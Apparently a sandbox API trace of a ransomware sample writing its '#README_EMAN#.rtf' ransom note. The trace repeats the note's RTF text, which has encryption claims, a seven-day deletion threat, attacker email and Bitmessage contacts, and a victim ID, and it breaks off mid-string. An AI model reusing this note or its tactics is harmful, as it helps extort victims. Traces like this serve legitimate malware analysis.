g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.154] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38afa38, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x123\x12è\x12u\x12 ", lpUsedDefaultChar=0x0) returned 8717 [0300.154] WriteFile (in: hFile=0x2d4, lpBuffer=0x38afa38*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38afa38*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.155] CloseHandle (hObject=0x2d4) returned 1 [0300.155] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\zu-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\zu-za\\#readme_eman#.rtf")) returned 0xffffffff [0300.155] GetLastError () returned 0x2 [0300.155] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\zu-za\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\zu-za\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 